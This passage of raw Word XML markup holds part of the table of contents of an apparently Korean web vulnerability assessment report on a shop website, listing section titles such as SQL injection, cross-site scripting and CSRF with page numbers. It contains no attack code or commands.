            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:b w:val="0"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>J.W.P. MagicShop 웹 페이지 (http://43.203.87.232)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094553 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42F38228" w14:textId="117D84BA" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094554" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>(1)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>운영체제 명령 실행</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094554 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12D508A2" w14:textId="641CA0CF" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094555" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>(2)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>SQL 인젝션</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094555 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="11B8E900" w14:textId="1D07ADE6" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094556" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>(3)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>디렉터리 인덱싱</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094556 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DCF56AD" w14:textId="04CE1305" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094557" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>(4)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>정보 누출</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094557 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="163D1519" w14:textId="0700087B" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094558" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>(5)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>악성 콘텐츠</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094558 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="405F2970" w14:textId="0F90AD43" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094559" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>(6)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>크로스사이트 스크립팅</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094559 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1DC580DC" w14:textId="6ED055F5" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094560" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>(7)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>약한 문자열 강도</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094560 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3CED433A" w14:textId="14B9A802" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094561" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>(8)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>불충분한 인증</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094561 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7538D099" w14:textId="0EC7FFF7" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094562" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>(9)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>취약한 패스워드 복구</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094562 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>38</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1FA77731" w14:textId="63F9ADFF" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094563" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>(10)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>크로스사이트 리퀘스트 변조(CSRF)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094563 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>40</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76946525" w14:textId="7B90B3AA" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094564" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>(11)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>불충분한 인가</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094564 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="35F92E2F" w14:textId="13EAEEDC" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094565" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>(12)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>세션 고정</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094565 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>47</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="336D90B9" w14:textId="6900DA92" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094566" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>(13)</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E" w:rsidRPr="00E85F10">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>자동화 공격</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094566 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>49</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
